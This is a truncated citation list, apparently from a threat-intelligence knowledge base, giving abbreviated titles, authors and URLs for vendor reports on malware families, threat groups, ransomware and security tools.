OWASP Top OWASP. (20 https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
ObfuscatedMicrosoft. https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-
Objective Sandvik, R https://objective-see.com/blog/blog_0x68.html
Objective Wardle, P. https://objective-see.org/blog/blog_0x69.html
ObjectiveSPatrick Warhttps://objective-see.org/blog/blog_0x49.html
Office 365 Microsoft. https://docs.microsoft.com/en-us/microsoft-365/commerce/manage-partners?view=o365-worldwide
OilRig ISM Falcone, R.https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linke
OilRig NewFalcone, R.https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-d
Okta BlockMoussa Dial https://sec.okta.com/blockanonymizers
Okta DPoPVenkat Visw https://www.okta.com/blog/2023/06/a-leap-forward-in-token-security-okta-adds-support-for-dpop/
Operation Haq, T., M https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-qua
PTSecurityPositive Tehttps://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf
PTSecurityPositive Tehttps://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf
PTSecurityPT ESC Threhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetin
PWC CloudPwC and BAE https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hoppe
PWC CloudPwC and BAE https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.
PWC KeyBoParys, B. ( https://web.archive.org/web/20211129064701/https://www.pwc.co.uk/issues/cyber-security-services/r
PWC WellMPWC. (2020https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.htm
PWC WellMe PWC. (2020https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html
PWC YellowPwC Threathttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scrip
Palo Alto Palo Alto https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-an
Palo Alto Quist, N. https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/
Palo Alto BHarbison, M https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/
Palo Alto Falcone, R.http://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-d
Palo Alto Grunzweig,https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-e
Palo Alto Grunzweig,http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-c
Palo Alto Kasza, A. a https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution
Palo Alto LUnit 42. (2 https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-06-25-IOCs-from-Latr
Palo Alto Miller-Osb http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-att
Palo Alto Lee, B. Gruhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-lin
Palo Alto Elsad, A. https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware
Palo Alto OFalcone, R.https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persist
Palo Alto OFalcone, R.http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-developmen
Palo Alto Falcone, R.http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-org
Palo Alto OGrunzweig,http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset
Palo Alto OWilhoit, K https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-go
Palo Alto Lancaster, https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/
Palo Alto Grunzweig,https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-disco
Palo Alto RLevene, B.,https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerlan
Palo Alto RRay, V., Ha http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-t
Palo Alto Falcone, R.http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/
Palo Alto Lee, B., Fa https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
Palo Alto Grunzweig,http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-comple
Palo Alto Hinchliffe, https://unit42.paloaltonetworks.com/threat-assessment-ekans-ransomware/
Palo Alto UUnit 42. (2 https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/
Palo Alto Miller-Osb http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-atta
PaloAlto C Grunzweig,https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/
PaloAlto D Grunzweig,https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-
PaloAlto NKasza, A., https://researchcenter.paloaltonetworks.com/2016/02/nanocorerat-behind-an-increase-in-tax-themed-
PaloAlto P Levene, B. https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-in
PaloAlto UHayashi, K https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/
Peirates G InGuardians https://github.com/inguardians/peirates
Pentestlab netbiosX. ( https://pentestlab.blog/2017/04/19/stored-credentials/
PfammatterDamian Pfahttps://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
Phish Labs Hassold, Crhttps://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictm
Picus EmotÖzarslan, https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-b
Picus Labs Huseyin Cahttps://www.picussecurity.com/resource/the-mitre-attck-t1003-os-credential-dumping-technique-and-i
Picus Sodi Ozarslan, Shttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransom
PowerSploiPowerSploit http://powersploit.readthedocs.io
PowerSploiSchroeder,https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
PowersploiPowerSploit https://github.com/mattifestation/PowerSploit
Prevailion Smith, S., https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileles
Prevailion Adamitis, https://www.prevailion.com/phantom-in-the-command-shell-2/
Prevx CarbGiuliani, Mhttps://web.archive.org/web/20231227000328/http://pxnow.prevx.com/content/blog/carberp-a_modu
Profero A Global Thr https://web.archive.org/web/20210104144857/https://shared-public-reports.s3-eu-west-1.amazonaws.
ProofPointProofpointhttps://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-d
ProofPointProofpointhttps://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality
ProofpointProofpointhttps://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-featu
ProofpointMerriman, https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming
K
ProofpointMesa, M, ethttps://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199
ProofpointAxel F, Pie https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-
ProofpointRaggi, M. Shttps://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-se
Proofpoin Proofpointhttps://www.proofpoint.com/us/blog/threat-insight/geofenced-netwire-campaigns
ProofpointHuss, D. (2 https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-e
ProofpointRaggi, M. https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-techn
ProofpointLarson, S. https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight
ProofpointProofpointhttps://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian
ProofpointRaggi, M. https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operation
Proofpoin Proofpointhttps://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malw
ProofpointLesnewich,https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-informa
ProofpointMiller, J. https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta450-uses-embedded-links-pdf-attac
ProofpointMiller, J. https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453
ProofpointMiller, J. https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-rese
ProofpointAxel F. (20 https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts
ProofpointSchwarz, Dhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introdu
ProofpointProofpointhttps://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times
ProofpointProofpointhttps://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malwar
ProofpointSchwarz, Dhttps://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-troja
ProofpointProofpointhttps://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter
ProofpointMichael Rag https://www.proofpoint.com/us/blog/threat-insight/exploitation-dish-best-served-cold-winter-vivern-us
ProofpointHuss, D., e https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx
Protecting Microsoft. https://learn.microsoft.com/en-us/azure/active-directory/fundamentals/protect-m365-from-on-premise
PsExec RusRussinovichhttp://windowsitpro.com/systems-management/psexec
QiAnXin APQiAnXin Thrhttps://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-a
Qualys HerDani, M. ( https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticw
Qualys Lol Pradhan, A.https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporatin
RATANKBATrend Micro https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html
RSA Shell RSA Incidenhttps://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shel
RSA2017 De Adair, S. https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/5009/HTA-F02-Detecting-and
RSAC 2015Maccaglia, https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/2015.11.04_Evolving_Threat
Radware Mi Tsarfaty, Y https://www.radware.com/blog/security/2018/07/micropsia-malware/
Rancor UniAsh, B., et https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-u
Rancor WMJen Miller https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-atta
Rapid7 FakElkins, T. https://www.rapid7.com/blog/post/2024/07/24/malware-campaign-lures-users-with-fake-w2-form/
Rapid7 HA Eoin Millerhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-beh
Rapid7 KeyGuarnieri, https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/
Rclone Nick Craig- https://rclone.org
Re-Open wApple. (20 https://support.apple.com/en-us/HT204005
Ready.gov Ready.gov.https://www.ready.gov/business/implementation/IT
Reaqta MuReaqta. (2 https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/
Recorded FInsikt Gro https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf
Recorded FInsikt Grouhttps://www.recordedfuture.com/research/turla-apt-infrastructure
RecordedFu Insikt Gro https://www.recordedfuture.com/research/whispergate-malware-corrupts-computers-ukraine
Red CanaryRed Canaryhttps://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf?mkt_tok=M
Red CanaryRed Canary.https://redcanary.com/threat-detection-report/threats/dridex/
Red CanaryDonohue, Bhttps://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/
Red CanaryBrian Donoh https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
Red CanaryLambert, T.https://redcanary.com/blog/netwire-remote-access-trojan-on-linux/
Red CanaryTONY LAMBE https://redcanary.com/blog/netwire-remote-access-trojan-on-linux/
Red CanaryRainey, K. https://redcanary.com/threat-detection-report/threats/qbot/
Red CanaryRed Canaryhttps://redcanary.com/threat-detection-report/threats/socgholish/
Red CanaryHaag, M., Lhttps://redcanary.com/blog/verclsid-exe-threat-detection/
RedCanaryLambert, T.https://redcanary.com/blog/blue-mockingbird-cryptominer/
RedCanaryLauren Podhttps://redcanary.com/blog/threat-intelligence/raspberry-robin/
RedLock InHigashi, Mihttps://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse
Rewterz Si Rewterz. (2https://www.rewterz.com/threats/sidewinder-apt-group-campaign-analysis
Rewterz Si Rewterz. ( https://www.rewterz.com/articles/analysis-on-sidewinder-apt-group-covid-19
Rhino S3 RGietzen, S. https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/
RiskIQ Bri Klijnsma, Yhttps://web.archive.org/web/20181231220607/https://riskiq.com/blog/labs/magecart-british-airways-b
RiskIQ CobKlijnsma, Yhttps://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-p
RiskIQ CobKlijnsma, Yhttps://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/
RiskIQ Ne Klijnsma, https://web.archive.org/web/20181209083100/https://www.riskiq.com/blog/labs/magecart-newegg/
Riskiq RemKlijnsma, https://web.archive.org/web/20180124082756/https://www.riskiq.com/blog/labs/spear-phishing-turkis
Roadtools Dirk-jan Mohttps://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/
Rostovcev Nikita Rosthttps://www.group-ib.com/blog/apt41-world-tour-2021/
RotaJakiro Alex Turin https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/
RussinovichRussinovic https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
S2 Grupo TSalinas, M.https://www.securityartwork.es/wp-content/uploads/2017/07/Trickbot-report-S2-Grupo.pdf
S2W RacooS2W TALON. https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d
SANS ApplicBeechey, J https://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaga
SANS ConfiBurton, K. https://web.archive.org/web/20200125132645/https://www.sans.org/security-resources/malwarefaq/c
SANS Winds Karim, T. https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf
SCILabs MaSCILabs. (2https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/
SCILabs MaSCILabs. (2https://blog.scilabs.mx/en/ursa-mispadu-overlap-analysis-with-other-threats/
SCILabs URSCILabs. ( https://blog.scilabs.mx/en/evolution-of-banking-trojan-ursa-mispadu/
SOCRadar ISOCRadar. https://socradar.io/dark-web-profile-inc-ransom/
STIG krbtgtUCF. (n.d.) https://www.stigviewer.com/stig/windows_server_2016/2019-12-12/finding/V-91779
SWAT-hospi Giles, Bruc https://www.beckershospitalreview.com/cybersecurity/hackers-threaten-to-send-swat-teams-to-fred-h
Sandfly BP The Sandflyhttps://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/
Savill 1999Savill, J. https://web.archive.org/web/20150511162820/http://windowsitpro.com/windows/netexe-reference
Scarlet Mi Falcone, R.http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-mino
SecTools nSecTools. ( https://sectools.org/tool/nbtscan/
Secpod WinPrakash, T https://web.archive.org/web/20211019012628/https://www.secpod.com/blog/winexe/
Secure HosNational Sehttps://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET
Secure Ide Kuehn, E. https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html
Secure ListMamedov,https://securelist.com/bad-rabbit-ransomware/82851/
O.
SecureList Namestnikov https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/
SecureList GReAT. (201 https://securelist.com/the-silence/83009/
SecureList Ivanov, A. https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
SecureWork SecureWork https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign
SecureWorCounter Thhttps://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader
SecureWorCounter Thhttps://www.secureworks.com/research/bronze-union
SecureWork Counter Thr https://www.secureworks.com/research/the-curious-case-of-mia-ash
SecureWorSecureWork https://www.secureworks.com/research/revil-sodinokibi-ransomware
SecureWork Counter Thhttps://www.secureworks.com/research/wcry-ransomware-analysis
Securelist Kaspersky Lhttps://securelist.com/apt-trends-report-q2-2017/79332/
Securelist GREAT. (20https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaig
Securelist Gostev, A..https://securelist.com/agent-btz-a-source-of-inspiration/58551/
Securelist Baumgartner https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/
Securelist Baumgartner https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/
Securelist Kaspersky Lhttps://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/
Securelist GReAT. (202 https://securelist.com/the-tetrade-brazilian-banking-malware/97779/
Securelist Kuzin, M., https://securelist.com/calisto-trojan-for-macos/86543/
Securelist Golovanov,https://securelist.com/darkvishnya/89169/
Securelist Kaspersky Lhttps://securelist.com/darkhotels-attacks-in-2015/71713/
Securelist Shulmin, A https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/
Securelist Kaspersky Lhttps://securelist.com/the-dropping-elephant-actor/75328/
Securelist Konstantinhttps://securelist.com/my-name-is-dtrack/93338/
Securelist Kaspersky Lhttps://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/7
Securelist Tarakanov https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/
Securelist Legezo, D. https://securelist.com/luckymouse-hits-national-data-center/86083/
Securelist Kaspersky https://securelist.com/el-machete/66108/
Securelist Kaspersky https://cdn.securelist.com/files/2014/07/themysteryofthepdf0-dayassemblermicrobackdoor.pdf
Securelist Kaspersky https://securelist.com/muddywater/88059/
Securelist Kaspersky Lhttps://securelist.com/octopus-infested-seas-of-central-asia/88200/
Securelist Legezo, D. https://securelist.com/chafer-used-remexi-malware/89538/
Securelist Raiu, C., a https://securelist.com/operation-daybreak/75100/
Securelist GReAT. (201 https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/
Securelist GReAT. (20https://securelist.com/shadowpad-in-corporate-networks/81432/
Securelist Kaspersky Lhttps://securelist.com/a-slice-of-2017-sofacy-activity/83930/
Securelist Kaspersky https://securelist.com/introducing-whitebear/81638/
Securelist Kaspersky Lhttps://securelist.com/fileless-attacks-against-enterprise-networks/77403/
SecureworkCarvey, H. https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-win
SecureworCounter Thhttps://www.secureworks.com/research/bronze-butler-targets-japanese-businesses
SecureworCounter Thhttps://www.secureworks.com/research/bronze-president-targets-ngos
SecureworCounter Thhttps://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-govern
SecureworCounter Thhttps://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox
SecureworCounter Thhttps://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities
SecureworCounter Thhttps://www.secureworks.com/blog/cobalt-dickens-goes-back-to-school-again
SecureworkCounter Thhttps://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations
SecureworkSecureworkhttps://www.secureworks.com/research/darktortilla-malware-analysis
SecureworkMclellan, https://www.secureworks.com/blog/lazy-passwords-become-rocket-fuel-for-emotet-smb-spreader
SecureworSecureworks https://www.secureworks.com/research/threat-profiles/gold-cabin
SecureworkCounter Thhttps://www.secureworks.com/blog/gold-ionic-deploys-inc-ransomware
